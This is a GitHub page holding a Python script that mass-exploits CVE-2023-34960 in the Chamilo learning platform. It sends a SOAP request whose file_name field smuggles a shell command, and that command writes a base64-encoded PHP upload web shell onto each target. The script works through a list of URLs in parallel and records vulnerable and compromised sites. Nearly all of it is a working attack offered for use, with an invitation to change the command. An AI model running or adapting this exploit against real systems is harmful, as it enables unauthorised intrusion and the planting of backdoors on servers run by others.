-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2023-34960.py
32 lines (30 loc) · 2.85 KB
/
CVE-2023-34960.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests,sys,os
from colorama import Fore,Style, init
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
init(autoreset=True)
def rcechamilo(url):
try:
#change command if u need :D
command = "echo 'PD9waHAKZWNobyAnPGltZyBjbGFzcz0iIGhlaWdodD0iMjAwIiBzcmM9Imh0dHBzOi8vaS5pYmIuY28vNjRQRzRacC9pbWFnZXMucG5nIi8+PHRpdGxlPkZha2UgVGF4aTwvdGl0bGU+JzsKZWNobyAnPGI+PGZvbnQgZmFjZT0iQ291cmllciBuZXciIGNvbG9yPSJibGFjayIgc2l6ZT0iNiI+fCBfQnlNRSAtIEplbmRlcmFsOTIgLSBBamliYXJhbmcxMzM3IHw8L2I+PC9mb250Pic7CmVjaG8gIjxiPiIucGhwX3VuYW1lKCkuIjwvYj48YnI+IjsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsKaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+JzsgfQplbHNlIHsgZWNobyAnPGI+Tm90IHVwbG9hZGVkICEgPC9iPjxicj48YnI+Jzt9Cn0KPz4=' | base64 -d >> shin.php"
body = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">|" |{}||a #`.pptx'</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url,command)
response = requests.post(url+'/main/webservices/additional_webservices.php', data=body, headers={'Content-Type': 'text/xml; charset=utf-8'})
if response.status_code == 200 and "wsConvertPptResponse" in response.text:
print(Fore.GREEN + 'Vuln' +Fore.RESET+ ' ' +url)
open('vuln_chamilo.txt','a').write(url+'\n')
response2 = requests.get(url+'/main/inc/lib/ppt2png/1.php')
if 'Jenderal92' in response2.content:
print(Fore.GREEN + 'Succes Get Shell' +Fore.RESET+ ' ' +url)
open('shell_chamilo.txt','a').write(url+'/main/inc/lib/ppt2png/1.php')
else:
print(url + ' ' +Fore.RED+ 'Not Vuln'+Fore.RESET)
except:
print(Fore.RED+'Error\n' +Fore.RESET)
pass
print "{} CVE-2023-34960 | Shin Code\n".format(Fore.YELLOW)
url = open(raw_input(Fore.WHITE+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(20))
pool.map(rcechamilo, url)
pool.close()
pool.join()